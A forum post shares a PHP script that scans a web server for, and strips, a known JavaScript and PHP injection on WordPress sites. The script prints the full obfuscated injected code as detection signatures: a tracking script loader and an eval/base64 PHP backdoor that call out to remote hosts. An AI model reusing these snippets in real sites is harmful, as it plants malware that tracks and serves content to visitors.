Just wanted to share this with you as it might affect your traffic. Funny thing is that Google doesn't report it yet as badware.
There is a new kind of JS malware that injects code to create 1-pixel iframes and connect to certain sites.
I just scanned 150 domains and some of my WP installs were infected.
Here is a link from a German coder offering a workable solution. Copy the code into a PHP file and upload it to the root of your server.
Once done type
www.xxxx.xx/filename.php to start scanning your files.
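It also disinfects your code. It does this by overwriting each infected file in place, so take a backup before running it and delete the script from the server once the scan is done. Here are the links: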
http://forum.nexoneu.com/NXEU.aspx?g=posts&m=3143118
http://blog.insidecomp.com/?p=33#more-33
PHP Code:
<pre><!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>INSIDE Computer MalwareCheck 0.1</title>
</head>
<body>
<h1>Javascript und PHP Files werden auf Befall gecheckt:</h1>
<?php
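// Entry point: scan everything below the current working directory and print a
// summary. The scan starts as soon as this file is requested and rewrites
// infected files on disk, so the script should not stay on the server after use.
$start_dir = getcwd();

// The path is escaped because it is written into the HTML report.
echo '<h2>Startverzeichnis:' . htmlspecialchars((string) $start_dir, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</h2><br/>';

// Counters are globals because disinfect() increments them via `global`.
$files_checked = 0;
$files_infected = 0;

echo '<table>';
dir_walk($start_dir, 'checkFiles');
echo '</table>';

echo '<h2>Files checked: ' . $files_checked . '<br/></h2>';
echo '<h2>Files infected: ' . $files_infected . '<br/></h2>';

// Only the two hard-coded signatures in checkFiles() are looked for, so this
// message means "neither of those was found", not "the site is clean".
if ($files_infected === 0) {
    echo 'Alles im grünen Bereich...';
}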
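/**
 * Recursively walk a directory tree and pass every file path to a callback.
 *
 * Prints one table row for each sub-directory that is entered.
 *
 * @param string   $start_dir Directory to list; paths are built as "$start_dir/entry".
 * @param callable $func      Invoked as $func($path) for every entry that is not a directory.
 * @return void
 */
function dir_walk($start_dir, $func) {
    // A directory that cannot be listed is skipped instead of letting
    // scandir() return false into the foreach below.
    if (!is_dir($start_dir) || !is_readable($start_dir)) {
        return;
    }

    $entries = scandir($start_dir);
    if ($entries === false) {
        return;
    }

    foreach ($entries as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }

        $path = $start_dir . '/' . $entry;

        // Symlinks are not followed: a link back to a parent directory would
        // recurse forever, and a link that points outside the start directory
        // would let the callback rewrite files beyond the tree being scanned.
        if (is_link($path)) {
            continue;
        }

        if (is_dir($path)) {
            // Escape the path: it ends up in the HTML report.
            echo '<tr><td><b>Scanning...' . htmlspecialchars($path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</b></td></tr>';
            dir_walk($path, $func);
        } else {
            $func($path);
        }
    }
}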
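/**
 * Check one file against the known injection signature for its type and hand
 * it to disinfect() for cleaning.
 *
 * Only files whose name ends in ".js" or ".php" are examined. Each signature
 * is one exact byte string, so a variant of the injected code that differs in
 * any byte is not detected; a "clean" result only rules out these two samples.
 *
 * @param string $filename Path of the file to check.
 * @return void
 */
function checkFiles($filename) {
    // Escaped copy for the HTML report; the raw name is still used for file access.
    $shown = htmlspecialchars($filename, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // Compare the real suffix. strpos() finds the FIRST ".js"/".php" in the
    // path, so a name such as "lib.js/app.js" or "x.json.js" was skipped.
    if (substr($filename, -3) === '.js') {
        echo '<tr><td>.js-File checking: ' . $shown . '</td>';
        // Single quotes keep the \xNN sequences literal, which is how they
        // appear in the injected, obfuscated script.
        $pattern='var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;';
        disinfect($filename, $pattern);
    }

    if (substr($filename, -4) === '.php') {
        // The report label used to say ".js-File" for PHP files as well.
        echo '<tr><td>.php-File checking: ' . $shown . '</td>';
        // Signature of the injected PHP block. It is only ever compared as
        // text here and is never executed by this script.
        $pattern='<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
        disinfect($filename, $pattern);
    }
}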
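/**
 * Undo htmlspecialchars() on a string.
 *
 * As published, this function replaced '&', '<', '>' and '"' with themselves
 * and turned 'ö', 'ä' and 'ü' into '?', so text escaped by disinfect() stayed
 * escaped and umlauts were destroyed when the cleaned file was written back.
 * NOTE(review): the entity names were presumably lost when the listing was
 * rendered as HTML; confirm against the author's original file.
 *
 * htmlspecialchars_decode() with default flags reverses exactly what
 * htmlspecialchars() with default flags produces on the same PHP version, in a
 * single pass, so "&amp;lt;" becomes "&lt;" rather than "<".
 *
 * @param string $val Text previously passed through htmlspecialchars().
 * @return string The text with the special-character entities decoded.
 */
function restore_hsc($val) {
    return htmlspecialchars_decode($val);
}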
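/**
 * Remove every occurrence of a known injected snippet from a file and report
 * the result as the closing cells of the current table row.
 *
 * The file is compared and rewritten as raw bytes. The earlier approach
 * escaped each line with htmlspecialchars() before matching, which yields an
 * empty string for lines that are not valid UTF-8 on older PHP versions, and
 * it rejoined lines that still carried their newline with "\n", which
 * double-spaced every cleaned file. It also called touch() on the closed file
 * handle instead of the file name.
 *
 * Increments the globals $files_checked and, when the snippet is found,
 * $files_infected.
 *
 * @param string $filename Path of the file to clean.
 * @param string $pattern  Exact text of the injected code to remove.
 * @return void
 */
function disinfect($filename, $pattern) {
    global $files_checked, $files_infected;
    $files_checked++;

    // Checked up front so a failed read is reported instead of raising warnings.
    $contents = is_readable($filename) ? file_get_contents($filename) : false;
    if ($contents === false) {
        echo " <td><span style=\"color:red;\"> - File could not be read</span></td></tr>";
        return;
    }

    // str_replace() leaves the text untouched for an empty search string and
    // reports the number of replacements in $found.
    $found = 0;
    $cleaned = str_replace(trim($pattern), '', $contents, $found);

    if ($found === 0) {
        echo " <td><span style=\"color:green;\"> - File is clean</span></td></tr>";
        return;
    }

    $files_infected++;

    // Only the matched bytes are removed; the rest of the file, including
    // whitespace and line endings, is written back unchanged.
    if (!is_writable($filename) || file_put_contents($filename, $cleaned, LOCK_EX) === false) {
        echo " <td><span style=\"color:red;\"> is infected. Could not be written: $found injected objects remain</span></td></tr>";
        return;
    }

    echo " <td><span style=\"color:red;\"> is infected. Cured: $found injected objects</span></td></tr>";
}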
?>
</body>
</html>